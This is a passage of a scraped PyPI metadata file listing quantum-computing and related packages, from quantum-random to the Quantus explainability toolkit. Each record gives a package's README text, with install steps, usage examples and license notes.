Install withpip:pipinstall-Uquantum-randomIf you want NumPy support:pipinstall-U'quantum-random[numpy]'First-time setup: setting your API keyANU requires you to use an API key. You can get a free trial or pay for a keyhere.You can pass your key toqrandomin three ways:By setting the environment variableQRANDOM_API_KEY.By running the included command line utilityqrandom-initto save your\nkey inqrandom.iniin a subdirectory of your home config directory\nas specified by XDG, e.g.,/home//.config/qrandom/.By runningqrandom-initto save your key inqrandom.iniin a directory\nof your choice, and then specifying this directory by settingQRANDOM_CONFIG_DIR.IfQRANDOM_API_KEYis set, its value is used as the API key and the\nconfig file is not read. Otherwise,qrandomwill look for the key\nin the config directory. The config directory defaults to the XDG home config\nand can be changed by settingQRANDOM_CONFIG_DIR.Pre-fetching batchesBatches of quantum numbers are fetched from the API as needed.\nEach batch contains 1024 numbers. Useqrandom.fill(n)to fetchnbatches\nif you need to pre-fetch at the start of your computation.TestsThe tests run for Python 3.9 - 3.12 on the latest Windows,\nmacOS and Ubuntu runner images. Usetoxto run the tests locally.Seeherefor a visualisation and a Kolmogorov\u2013Smirnov\ntest.Notes on implementationTheqrandommodule exposes a class derived fromrandom.Randomwith arandom()method that outputs quantum floats in the range [0, 1)\n(converted from 64-bit integers). Overridingrandom.Random.randomis sufficient to make theqrandommodule behave mostly like therandommodule as described in thePython docs. The exceptions\naregetrandbits()andrandbytes(): these are not available inqrandom. Becausegetrandbits()is not available,randrange()cannot\nproduce arbitrarily long sequences. Finally, the user is warned whenseed()is called because the quantum generator has no state. For the same reason,getstate()andsetstate()are not implemented.LicenseSeeLICENCE."} +{"package": "quantumreservoirpy", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-robot", "pacakge-description": "quantum-robotis a Python package for quantum-like perception modeling\nfor robotics. The package exploitsQiksitframework, implementing the models on quantum circuits which can be\nsimulated on a classical computer or sent to a quantum backend (service\nprovided byIBM Quantum\nExperience).The project was started in 2019 by Davide Lanza as a Master thesis\nresearch, with the help ofFulvio\nMastrogiovanniandPaolo\nSolinas.It is currently maintained by Davide Lanza.Website:http://quantum-robot.orgRepository:https://github.com/Davidelanz/quantum-robot/Documentation:http://quantum-robot.org/docsContentsInstallNotebooksContributingCitingLicenseInstallDependenciesSee the required packageshere.User installationThe easiest way to installquantum-robotis usingpip:pip install -U quantum-robotThe package can beinstalled from\nsourceas well. You can check the latest sources with the command:git clone https://github.com/Davidelanz/quantum-robot.gitTestingAfter installation, you can launch the test suite from outside the\nsource directory (you will need to havepytestinstalled):pytest qrobotSee also theGetting\nStartedguide.ContributingIf you are interested in the project, we welcome new contributors of all\nexperience levels. 
For any question,contact the maintainer.An example module with the docstring standard we adopted is availablehere.LicenseGNU-GPLv3"} +{"package": "quantumsculpt", "pacakge-description": "QuantumSculptQuantumSculpt is a bundle of Python scripts to analyze the electronic\nstructure of systems calculated usingVASP. QuantumSculpt\nis designed to operate onVASP WAVECARfiles\nand on the output files ofLobster, specifically DOS and COHP\ntypes of files.InstallationAnacondacondainstall-cifilotquantumsculptPyPipipinstallquantumsculptManualSee:https://quantumsculpt-inorganic-materials-chemistry-5002ad1bf06a7fa61a5.pages.tue.nl/"} +{"package": "quantumsecurity", "pacakge-description": "QuantumSecurityA Python package for supporting security applications with the power of quantum computing and cryptography.DescriptionQuantumSecurity is a Python package designed to assist developers in implementing security applications using quantum computing and cryptography. The package currently provides a function namedqrandthat generates quantum random numbers. The generated quantum random numbers are in hexadecimal format.InstallationYou can install QuantumSecurity using pip:pipinstallquantumsecurity## Usagefromquantumsecurityimportqrand# Generate a quantum random number with 16 bitsrandom_number=qrand(16)print(\"Quantum Random Number:\",random_number)## DependenciesThe current version of QuantumSecurity relies on the Qiskit package and its 'qasm_simulator' for quantum random number generation. In future iterations, support for other simulators from Amazon Braket and quantum hardware facilities will be added to the 'qrand' function.## Future FeaturesIn future releases, QuantumSecurity aims to provide additional dynamic functions related to quantum cryptography and post-quantum cryptography. These functions will empower developers to streamline their security implementations without writing extensive code."} +{"package": "quantum-serverless", "pacakge-description": "Quantum Serverless clientInstallationpipinstallquantum_serverlessDocumentationFull docs can be found athttps://qiskit-extensions.github.io/quantum-serverless/UsageStep 1: write patternfromquantum_serverlessimportdistribute_task,get,get_arguments,save_resultfromqiskitimportQuantumCircuitfromqiskit.circuit.randomimportrandom_circuitfromqiskit.primitivesimportSamplerfromqiskit.quantum_infoimportSparsePauliOp# 1. let's annotate our function to convert it# to a distributed async function# using the `distribute_task` decorator@distribute_task()defdistributed_sample(circuit:QuantumCircuit):\"\"\"Calculates quasi dists as a distributed function.\"\"\"returnSampler().run(circuit).result().quasi_dists[0]# 2. our program will have one argument# `circuits` which will store a list of circuits# we want to sample in parallel.# Let's use the `get_arguments` function# to access all program argumentsarguments=get_arguments()circuits=arguments.get(\"circuits\",[])# 3. run our functions in a loop# and get execution references backfunction_references=[distributed_sample(circuit)forcircuitincircuits]# 4. `get` function will collect all# results from distributed functionscollected_results=get(function_references)# 5. 
`save_result` will save results of program execution# so we can access it latersave_result({\"quasi_dists\":collected_results})Step 2: run patternfromquantum_serverlessimportServerlessProvider,QiskitPatternfromqiskit.circuit.randomimportrandom_circuitserverless=ServerlessProvider(username=\"\",password=\"\",host=\"\",)# create programprogram=QiskitPattern(title=\"Quickstart\",entrypoint=\"pattern.py\",working_dir=\"./src\")# create inputs to our programcircuits=[]for_inrange(3):circuit=random_circuit(3,2)circuit.measure_all()circuits.append(circuit)# run programjob=serverless.run(program=program,arguments={\"circuits\":circuits})Step 3: monitor job statusjob.status()# 'DONE'# or get logsjob.logs()Step 4: get resultsjob.result()# {\"quasi_dists\": [# {\"0\": 0.25, \"1\": 0.25, \"2\": 0.2499999999999999, \"3\": 0.2499999999999999},# {\"0\": 0.1512273969460124, \"1\": 0.0400459556274728, \"6\": 0.1693190975212014, \"7\": 0.6394075499053132},# {\"0\": 0.25, \"1\": 0.25, \"4\": 0.2499999999999999, \"5\": 0.2499999999999999}# ]}"} +{"package": "quantum-sg", "pacakge-description": "quantum-sgA command line tool that generates a cryptographically secure quantum-level secrets using ANU QRNG.UsageThis function generates a random set of secrets using the quantumrandom library. The parameters population, number and length are optional.fromstringimportdigitsfromquantum_sgimportrandrand(length=24,number=2,population=digits)Usage as CLI$pipinstallquantum-sg\n$quantum-sg-l24-n2>4HOpcSlzrP1JA5pFROUJLi7V\n>FkEKjlgm08Ey17HrAeeKKRl4OptionsThis command line utility can be used to generate secure secrets of specified length and complexity.The-hor--helpflag will display a help message to the user with instructions on how to use the utility.The-nor--numberflag will allow the user to specify the number of secrets to generate. By default, the utility will generate one secret.The-lor--lengthflag will allow the user to specify the length of each generated secret. By default, this length is 24 characters.The-wd,--digits,-wl,--lowercase,-wu,--uppercase,-wpand--punctuationflags will allow the user to specify which types of characters should be included in the generated secrets. By default, digits, lowercase characters, and uppercase characters are included.LicenseThe MIT License (MIT)Copyright (c) 2023 Alexander ShelepenokPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "quantumsim", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-simba", "pacakge-description": "SImBA - Systematic Inference of Bosonic quAntum systems>>Documentation< setup.py"} +{"package": "quantum-tree", "pacakge-description": "This Python package implements quantum decision tree classifiers for binary data. The details of the method can be found inRepresentation of binary classification trees with binary features by quantum circuits.InstallationInstall viapipor clone this repository. In order to usepip, type:$pipinstallquantum-tree\ud83c\udf33UsageMinimal working example:# create quantum tree instancefromqtree.qtreeimportQTreeqtree=QTree(max_depth=1)# create simple training dataimportnumpyasnpX=np.array([[1,0,0],[0,1,0],[0,0,1]])# featuresy=np.array([[0,0],[0,1],[1,1]])# labels# fit quantum treeqtree.fit(X,y)# make quantum tree predictionqtree.predict([[0,0,1]])DocumentationDocumentation is available onhttps://qtree.readthedocs.io/en/latest.Demo notebooks can be found in theexamples/directory.\ud83d\udcd6CitationIf you find this code useful in your research, please consider citingRepresentation of binary classification trees with binary features by quantum circuits:@article{Heese2022representationof,\n doi ={10.22331/q-2022-03-30-676},\n url ={https://doi.org/10.22331/q-2022-03-30-676},\n title ={Representation of binary classification trees with binary features by quantum circuits},\n author ={Heese, Raoul and Bickert, Patricia and Niederle, Astrid Elisa},\n journal ={{Quantum}},\n issn ={2521-327X},\n publisher ={{Verein zur F{\\\"{o}}rderung des Open Access Publizierens in den Quantenwissenschaften}},\n volume ={6},\n pages ={676},\n month ={3},\n year ={2022}}This project is currently not under development and is not actively maintained."} +{"package": "quantum-tv", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-tvos", "pacakge-description": "No description available on PyPI."} +{"package": "quantumtw", "pacakge-description": "quantumtwThis project is developed by TENG-LIN YU. 
You can contact me by following methods:Mail:tlyu0419@gmail.comFacebook:https://www.facebook.com/tlyu0419requirementspip install requirementsquery_dateUnlike twstock packages, it requests the data by session.get() so that we don't need to sleep 5 seconds for each request.\nNotice: You can't query data by the browser while running this function, or you will be banned by the website.query Highlights of Daily Tradingquery singal stockquery Top 150 stocksquery specific stocks.trade_signalsby Machine Learning modeltimeseriesby DomainsVisualize ResultNewsYahoo marketNotificationMailIf you only want to receive the result, you can send mail to me, and then I will send mail to you daily:)AnnouncementIt's just a toy project, the prediction of the stock price is based on historical data, but in fact, many circumstances could affect the stock price.\n2610 is a bad example; another is a good example\nso the project only offers trade signals; you need to consider other information and then buy or sell your stock.Ref packagesProphetFindMindFindLab\u6a5f\u5668\u5b78\u7fd2\u65bc\u91cf\u5316\u4ea4\u6613\u7684\u6311\u6230\u8207\u89e3\u6cd5 - \u97d3\u627f\u4f51 | MOPCON 2019How to label trade signalsvariables"} +{"package": "quantum-uwp", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-viz", "pacakge-description": "quantum-vizquantum-vizis the Python package companion ofquantum-viz.js, a JavaScript package that supports visualizing any arbitrary quantum gate, classical control logic and collapsed grouped blocks of gates using JSON-formatted input data.quantum-vizcontains a Jupyter widget and will also include support for translating quantum circuits written in common quantum programming libraries to JSON using thequantum-viz.jsJSON schema.InstallationYou can install thequantum-viz.js widgetviapipfrom PyPI:pipinstallquantum-vizExampleTo use the quantum-viz widget, run the below example code in aJupyter notebookcell:fromquantum_vizimportViewer# Create a quantum circuit that prepares a Bell statecircuit={\"qubits\":[{\"id\":0},{\"id\":1,\"numChildren\":1}],\"operations\":[{\"gate\":'H',\"targets\":[{\"qId\":0}],},{\"gate\":'X',\"isControlled\":\"True\",\"controls\":[{\"qId\":0}],\"targets\":[{\"qId\":1}],},{\"gate\":'Measure',\"isMeasurement\":\"True\",\"controls\":[{\"qId\":1}],\"targets\":[{\"type\":1,\"qId\":1,\"cId\":0}],},],}widget=Viewer(circuit)widget# Display the widgetQiskit IntegrationBy installing the optional[qiskit]dependency, you can leverage Qiskit'sQuantumCircuitAPIs\nto define the circuit and render it using theViewerwidget on Jupyter, for example:fromqiskitimportQuantumRegister,ClassicalRegister,QuantumCircuitfromquantum_vizimportViewerqr=QuantumRegister(3,'q')anc=QuantumRegister(1,'ancilla')cr=ClassicalRegister(3,'c')qc=QuantumCircuit(qr,anc,cr)qc.h(qr[0:3])qc.x(anc[0])qc.h(anc[0])qc.cx(qr[0:3],anc[0])qc.h(qr[0:3])qc.barrier(qr)qc.measure(qr,cr)Viewer(qc)Optionally, you can also import thedisplaymethod fromquantum_viz.utilsto render the circuit on a new browser window:fromquantum_viz.utilsimportdisplaydisplay(qc)ContributingCheck out ourcontributing guidelinesto find out how you can contribute to quantum-viz."} +{"package": "quantum-volume", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-vqe", "pacakge-description": "Quantum VQE PackageThe Quantum VQE (Variational Quantum Eigensolver) package is a Python library for simulating the VQE algorithm on quantum computers. 
It utilizes the Qiskit framework to create and optimize quantum circuits that estimate the ground state energy of a given Hamiltonian.FeaturesImplementation of the VQE algorithm using Qiskit.Functions to create variational ansatzes for quantum circuits.Optimization routines to find the minimum eigenvalue of the Hamiltonian.Utilities for validating input Hamiltonians.InstallationBefore installing the Quantum VQE package, ensure that you have Python 3.7 or higher and pip installed.To install the Quantum VQE package, run the following command in your terminal:pip install git+https://github.com/SweatyCrayfish/quantum_vqe.gitAlternatively, you can clone the repository and install the package locally:gitclonehttps://github.com/SweatyCrayfish/quantum_vqe.gitcdquantum_vqe\npipinstall.UsageHere is a simple example of how to use the Quantum VQE package to find the ground state energy of a Hamiltonian:fromqiskit.opflowimportX,Z,Ifromquantum_vqe.vqeimportcreate_vqe_ansatz,optimize_vqefromqiskitimportAerDefine your Hamiltonian. For example, for a simple 2-qubit system:hamiltonian=(X^X)+(Z^I)Definethequantumbackendbackend=Aer.get_backend('statevector_simulator')circuit,parameters=create_vqe_ansatz(num_qubits=2)Optimizethecircuitparametersresult=optimize_vqe(circuit,hamiltonian,backend)print(f\"Ground state energy:{result.fun}\")For more detailed examples, please refer to the examples/ directory in the repository.DevelopmentTo contribute to the Quantum VQE package, you can clone the repository and set up a development environment:gitclonehttps://github.com/SweatyCrayfish/quantum_vqe.gitcdquantum_vqe\npipinstall-e.TestingTo run the tests for the Quantum VQE package, navigate to the package root and execute:python -m unittest discover testsLicenseThis project is licensed under the MIT License - see the LICENSE file for details.AuthorsViktor Veselov - Initial workAcknowledgmentsThe Qiskit community for providing the framework to build upon.CitationIf you use this package in your research, please cite it as follows:@misc{quantum_vqe,\nauthor = {Viktor Veselov},\ntitle = {Quantum VQE: A Variational Quantum Eigensolver Package},\nyear = {2023},\npublisher = {GitHub},\njournal = {GitHub repository},\nhowpublished = {url{https://github.com/SweatyCrayfish/quantum_vqe}}}"} +{"package": "quantum-watch", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-watchos", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-web", "pacakge-description": "No description available on PyPI."} +{"package": "quantumwerewolf", "pacakge-description": "Quantum WerewolfQuantum Werewolf is a game based on the party game \"The Werewolves of Millers Hollow\" (known as \"Weerwolven van Wakkerdam\" to Dutch audiences) with a quantum mechanical twist: Players play all possible games of werewolf at the same time.Original puzzle:https://web.archive.org/web/20080719133809/http://puzzle.cisra.com.au/D-5-Schroedingers-Wolves.pdfSolution and original explanation:https://web.archive.org/web/20181116123708/https://puzzle.cisra.com.au/2008/quantumwerewolf.htmlInstallation$ pip install git+https://github.com/ProodjePindakaas/Quantum-WerewolfUsageStart the game in a terminal by running thequantum-werewolfcommand.AboutWhat is \"The Werewolves of Millers Hollow\"?The Werewolves of Millers Hollow is a classical party game where each player (save the game master) gets a secret role card assigned to them. 
There are two teams: the werewolves\nand the village (consisting of all roles except the werewolves). At night, each player secretly takes an action corresponding to their role -- the seer gets to see another player's card,\nCupid can make two players fall in love, and the werewolves vote on who they will eat that night. During the day, all players vote on another player to be lynched.\nThe village's goal is to kill all werewolves, and the werewolves' goal is to kill all non-werewolves. When only one faction is left, they win.What is the quantum twist?The quantum twist introduced in Quantum Werewolf is a superposition of roles. This means that every player is every role at once, and gets to take actions corresponding to all roles at night.\nOf course, the superposition can be collapsed by measurements. Currently, there are two ways of measuring the superposition:A player uses his Seer action to look at someone else's role, partially collapsing the superposition (and introducing entanglement!);A player dies, which reveals his role to all players, collapsing the superposition quite a bit.Since there is no way of knowing the final gamestate (in fact, your actions influence what the final measurement will be), it is important to players to \"crack\" the permutations\nand try to make the superposition collapse in their favour. The game is very complex, and honestly isn't much fun to play with your grandma. However, it can be used as an\neducation tool for superpositions, or as a way to pit physicists against each other in cracking the code.What are the rules?Game setupWhen you start a game of quantum werewolf, you are prompted to enter the names of all participating players first.\nAfter entering and confirming the list of players, you are presented with the standard role selection of 2 werewolves and the seer.\nYou may refuse this role selection and choose the amount of werewolves as well as the additional roles.A game of quantum werewolf needs at least 1 werewolf, optional roles are:Seer: Inspects the identity of a player each night, revealing their role to the seer.Cupid: Chooses two players to fall in love during the first night. Whenever one of the lovers dies, the other dies as well. The lovers win if they are the only 2 players left, regardless of role.Hunter: Whenever the hunter dies, they may choose to kill another player.You should also decide on the rules to follow during the day phase.Night phaseDuring the night all special roles get to take their specific actions. In quantum werewolf all players will take all their actions in turns.\nIn your turn you must specify how you would act as each role. You are only promted for actions corresponding to roles for which you have a non-zero probability to be.Day phaseAt the start of the day phase all players that have died during the night will be revealed, as will their roles.\nAfter the reveal, the players are presented with the current state of the game in which all players and their chances of being each role is tabulated.\nAll players in the table are anomymous except for dead players. 
The order of the players is random, but fixed throughout the game.All players that are still alive must now discuss whoever they will lynch.\nThis discussion is separate from the interface of the game.\nYou should decide beforehand on the format of this discussion and how the lynch target will be decided."} +{"package": "quantum-win32", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-windows", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-winforms", "pacakge-description": "No description available on PyPI."} +{"package": "quantumworld", "pacakge-description": "No description available on PyPI."} +{"package": "quantumworldX", "pacakge-description": "No description available on PyPI."} +{"package": "quantum-xir", "pacakge-description": "XIRis an intermediate representation language for quantum circuits.FeaturesSimple. Easy to learn, write, and understand.Modular. Compose observables, gates, and entire XIR programs.Flexible. Declare or define your own gates and observables.InstallationXIR requires Python version 3.7 or above. Installation of XIR, as well as all\ndependencies, can be done using pip:pip install quantum-xirExamplesA curated selection of XIR scripts can be found in theExamplespage of the Sphinx documentation; however, the example below demonstrates a general overview of the syntax:// Include additional script\nuse my_declarations;\n\n// Declare custom gates\ngate RX(theta) [w1];\ngate RY(theta) [w1];\ngate RZ(theta) [w1];\ngate Toffoli [w1, w2, w3];\n\n// Declare a function\nfunc sin(x);\n\n// Declare observables\nobs X [w1]; obs Y [w1]; obs Z [w1];\n\n// Declare outputs\nout sample(shots) [0..8];\nout expval(observable) [w1, w2];\nout amplitude(state) [0..8];\n\n// Define a composite gate.\ngate R3T(theta)[a, b, c, d]:\n RX(theta: -2.3932854391951004) | [a];\n RY(theta) | [b];\n RZ(pi / sin(3 * 4 / 2 - 2)) | [c];\n Toffoli | [b, c, d];\nend;\n\n// Define an observable.\nobs XYZ [w1, w2]:\n -1.6, X[w1];\n 0.73, Y[w1] @ Z[w2];\nend;\n\n// Apply the gate twice.\nR3T(1.23) | [0, 1, 2, 3];\nR3T(theta: 3.21) | [4..8];\n\n// Compute various outputs.\nsample(shots: 1000) | [0..8];\nexpval(observable: XYZ) | [0, 3];\namplitude(state: [0, 1, 0, 1, 0, 0, 1, 1]) | [0..8];Contributing to XIRWe welcome contributions - simply fork the XIR repository, and then make apull\nrequestcontaining your\ncontribution. All contributors to XIR will be listed as authors on the releases.\nSee ourchangelogfor more details.We also encourage bug reports, suggestions for new features and enhancements,\nand even links to cool projects or applications built on XIR. Visit thecontributions\npageto learn more about sharing your ideas with the XIR team.SupportSource Code:https://github.com/XanaduAI/xirIssue Tracker:https://github.com/XanaduAI/xir/issuesIf you are having issues, please let us know by posting the issue on our GitHub issue tracker.AuthorsXIR is the work ofmany contributors.LicenseXIR isfreeandopen source, released under theApache License, Version 2.0."} +{"package": "quantum-xyz", "pacakge-description": "Quantum XYZXYZ is a Python package for quantum compilation. It provides several implementations for quantum circuit optimizations, such as exact CNOT synthesis.Read full documentationExamplepipinstallquantum-xyzcdexample\npythonsynthesize_dicke.py"} +{"package": "quantumz", "pacakge-description": "The QuantumZ package contains the set of functions to emulate quantum computations on the classical computers. 
The quantum states are supposed to be presented as dictionaries in the form {'|01>': 0.717, '|11>': 0.717} (for example). The same notation is used for the quantum gates.All functions are described in the source code."} +{"package": "quanturf", "pacakge-description": "No description available on PyPI."} +{"package": "quanturf-blankly", "pacakge-description": "No description available on PyPI."} +{"package": "quantus", "pacakge-description": "A toolkit to evaluate neural network explanationsPyTorch and TensorFlowQuantus is currently under active development so carefully note the Quantus release version to ensure reproducibility of your work.\ud83d\udcd1 Shortcut to paper!News and Highlights! :rocket:New metrics added:EfficientMPRTandSmoothMPRTbyHedstr\u00f6m et al., (2023)Released a new versionhereAccepted to Journal of Machine Learning Research (MLOSS), read thepaperOffers more than30+ metrics in 6 categoriesfor XAI evaluationSupports different data types (image, time-series, tabular, NLP next up!) and models (PyTorch, TensorFlow)Extended built-in support for explanation methods (captum,tf-explainandzennit)CitationIf you find this toolkit or its companion paperQuantus: An Explainable AI Toolkit for Responsible Evaluation of Neural Network Explanations and Beyondinteresting or useful in your research, use the following Bibtex annotation to cite us:@article{hedstrom2023quantus,author={Anna Hedstr{\\\"{o}}m and Leander Weber and Daniel Krakowczyk and Dilyara Bareeva and Franz Motzkus and Wojciech Samek and Sebastian Lapuschkin and Marina Marina M.{-}C. H{\\\"{o}}hne},title={Quantus: An Explainable AI Toolkit for Responsible Evaluation of Neural Network Explanations and Beyond},journal={Journal of Machine Learning Research},year={2023},volume={24},number={34},pages={1--11},url={http://jmlr.org/papers/v24/22-0142.html}}When applying the individual metrics of Quantus, please make sure to also properly cite the work of the original authors (as linked below).Table of contentsLibrary overviewInstallationGetting startedTutorialsContributingLibrary overviewA simple visual comparison of eXplainable Artificial Intelligence (XAI) methods is often not sufficient to decide which explanation method works best as shown exemplarily in Figure a) for four gradient-based methods \u2014 Saliency (M\u00f8rch et al., 1995;Baehrens et al., 2010), Integrated Gradients (Sundararajan et al., 2017), GradientShap (Lundberg and Lee, 2017) or FusionGrad (Bykov et al., 2021), yet it is a common practice for evaluation XAI methods in absence of ground truth data. Therefore, we developed Quantus, an easy-to-use yet comprehensive toolbox for quantitative evaluation of explanations \u2014 including 30+ different metrics.With Quantus, we can obtain richer insights on how the methods compare e.g., b) by holistic quantification on several evaluation criteria and c) by providing sensitivity analysis of how a single parameter e.g. the pixel replacement strategy of a faithfulness test influences the ranking of the XAI methods.MetricsThis project started with the goal of collecting existing evaluation metrics that have been introduced in the context of XAI research \u2014 to help automate the task ofXAI quantification. Along the way of implementation, it became clear that XAI metrics most often belong to one out of six categories i.e., 1) faithfulness, 2) robustness, 3) localisation 4) complexity 5) randomisation or 6) axiomatic metrics. 
The library contains implementations of the following evaluation metrics:Faithfulnessquantifies to what extent explanations follow the predictive behaviour of the model (asserting that more important features play a larger role in model outcomes)Faithfulness Correlation(Bhatt et al., 2020): iteratively replaces a random subset of given attributions with a baseline value and then measuring the correlation between the sum of this attribution subset and the difference in function outputFaithfulness Estimate(Alvarez-Melis et al., 2018): computes the correlation between probability drops and attribution scores on various pointsMonotonicity Metric(Arya et al. 2019): starts from a reference baseline to then incrementally replace each feature in a sorted attribution vector, measuring the effect on model performanceMonotonicity Metric(Nguyen et al, 2020): measures the spearman rank correlation between the absolute values of the attribution and the uncertainty in the probability estimationPixel Flipping(Bach et al., 2015): captures the impact of perturbing pixels in descending order according to the attributed value on the classification scoreRegion Perturbation(Samek et al., 2015): is an extension of Pixel-Flipping to flip an area rather than a single pixelSelectivity(Montavon et al., 2018): measures how quickly an evaluated prediction function starts to drop when removing features with the highest attributed valuesSensitivityN(Ancona et al., 2019): computes the correlation between the sum of the attributions and the variation in the target output while varying the fraction of the total number of features, averaged over several test samplesIROF(Rieger at el., 2020): computes the area over the curve per class for sorted mean importances of feature segments (superpixels) as they are iteratively removed (and prediction scores are collected), averaged over several test samplesInfidelity(Chih-Kuan, Yeh, et al., 2019): represents the expected mean square error between 1) a dot product of an attribution and input perturbation and 2) difference in model output after significant perturbationROAD(Rong, Leemann, et al., 2022): measures the accuracy of the model on the test set in an iterative process of removing k most important pixels, at each step k most relevant pixels (MoRF order) are replaced with noisy linear imputationsSufficiency(Dasgupta et al., 2022): measures the extent to which similar explanations have the same prediction labelRobustnessmeasures to what extent explanations are stable when subject to slight perturbations of the input, assuming that model output approximately stayed the sameLocal Lipschitz Estimate(Alvarez-Melis et al., 2018): tests the consistency in the explanation between adjacent examplesMax-Sensitivity(Yeh et al., 2019): measures the maximum sensitivity of an explanation using a Monte Carlo sampling-based approximationAvg-Sensitivity(Yeh et al., 2019): measures the average sensitivity of an explanation using a Monte Carlo sampling-based approximationContinuity(Montavon et al., 2018): captures the strongest variation in explanation of an input and its perturbed versionConsistency(Dasgupta et al., 2022): measures the probability that the inputs with the same explanation have the same prediction labelRelative Input Stability (RIS)(Agarwal, et. al., 2022): measures the relative distance between explanations e_x and e_x' with respect to the distance between the two inputs x and x'Relative Representation Stability (RRS)(Agarwal, et. 
al., 2022): measures the relative distance between explanations e_x and e_x' with respect to the distance between internal models representations L_x and L_x' for x and x' respectivelyRelative Output Stability (ROS)(Agarwal, et. al., 2022): measures the relative distance between explanations e_x and e_x' with respect to the distance between output logits h(x) and h(x') for x and x' respectivelyLocalisationtests if the explainable evidence is centred around a region of interest (RoI) which may be defined around an object by a bounding box, a segmentation mask or, a cell within a gridPointing Game(Zhang et al., 2018): checks whether attribution with the highest score is located within the targeted objectAttribution Localization(Kohlbrenner et al., 2020): measures the ratio of positive attributions within the targeted object towards the total positive attributionsTop-K Intersection(Theiner et al., 2021): computes the intersection between a ground truth mask and the binarized explanation at the top k feature locationsRelevance Rank Accuracy(Arras et al., 2021): measures the ratio of highly attributed pixels within a ground-truth mask towards the size of the ground truth maskRelevance Mass Accuracy(Arras et al., 2021): measures the ratio of positively attributed attributions inside the ground-truth mask towards the overall positive attributionsAUC(Fawcett et al., 2006): compares the ranking between attributions and a given ground-truth maskFocus(Arias et al., 2022): quantifies the precision of the explanation by creating mosaics of data instances from different classesComplexitycaptures to what extent explanations are concise i.e., that few features are used to explain a model predictionSparseness(Chalasani et al., 2020): uses the Gini Index for measuring, if only highly attributed features are truly predictive of the model outputComplexity(Bhatt et al., 2020): computes the entropy of the fractional contribution of all features to the total magnitude of the attribution individuallyEffective Complexity(Nguyen at el., 2020): measures how many attributions in absolute values are exceeding a certain thresholdRandomisationtests to what extent explanations deteriorate as inputs to the evaluation problem e.g., model parameters are increasingly randomisedMPRT (Model Parameter Randomisation Test)(Adebayo et. al., 2018): randomises the parameters of single model layers in a cascading or independent way and measures the distance of the respective explanation to the original explanationSmooth MPRT(Hedstr\u00f6m et. al., 2023): adds a \"denoising\" preprocessing step to the original MPRT, where the explanations are averaged over N noisy samples before the similarity between the original- and fully random model's explanations is measuredEfficient MPRT(Hedstr\u00f6m et. 
al., 2023): reinterprets MPRT by evaluating the rise in explanation complexity (discrete entropy) before and after full model randomisation, asking for increased explanation complexity post-randomisationRandom Logit Test(Sixt et al., 2020): computes for the distance between the original explanation and the explanation for a random other classAxiomaticassesses if explanations fulfil certain axiomatic propertiesCompleteness(Sundararajan et al., 2017): evaluates whether the sum of attributions is equal to the difference between the function values at the input x and baseline x' (and referred to as Summation to Delta (Shrikumar et al., 2017), Sensitivity-n (slight variation, Ancona et al., 2018) and Conservation (Montavon et al., 2018))Non-Sensitivity(Nguyen at el., 2020): measures whether the total attribution is proportional to the explainable evidence at the model outputInput Invariance(Kindermans et al., 2017): adds a shift to input, asking that attributions should not change in response (assuming the model does not)Additional metrics will be included in future releases. Pleaseopen an issueif you have a metric you believe should be apart of Quantus.Disclaimers.It is worth noting that the implementations of the metrics in this library have not been verified by the original authors. Thus any metric implementation in this library may differ from the original authors. Further, bear in mind that evaluation metrics for XAI methods are often empirical interpretations (or translations) of qualities that some researcher(s) claimed were important for explanations to fulfil, so it may be a discrepancy between what the author claims to measure by the proposed metric and what is actually measured e.g., using entropy as an operationalisation of explanation complexity. Please read theuser guidelinesfor further guidance on how to best use the library.InstallationIf you already havePyTorchorTensorFlowinstalled on your machine,\nthe most light-weight version of Quantus can be obtained fromPyPIas follows (no additional explainability functionality or deep learning framework will be included):pip install quantusAlternatively, you can simply add the desired deep learning framework (in brackets) to have the package installed together with Quantus.\nTo install Quantus with PyTorch, please run:pip install \"quantus[torch]\"For TensorFlow, please run:pip install \"quantus[tensorflow]\"Package requirementsThe package requirements are as follows:python>=3.7.0\ntorch>=1.11.0\ntensorflow>=2.5.0Please note that the exactPyTorchand/ orTensorFlowversions\nto be installed depends on your Python version (3.7-3.11) and platform (darwin,linux, \u2026).\nSee[project.optional-dependencies]section in thepyproject.tomlfile.Getting startedThe following will give a short introduction to how to get started with Quantus. Note that this example is based on thePyTorchframework, but we also supportTensorFlow, which would differ only in the loading of the model, data and explanations. To get started with Quantus, you need:A model (model), inputs (x_batch) and labels (y_batch)Some explanations you want to evaluate (a_batch)Step 1. Load data and modelLet's first load the data and model. In this example, a pre-trained LeNet available from Quantus\nfor the purpose of this tutorial is loaded, but generally, you might use any Pytorch (or TensorFlow) model instead. 
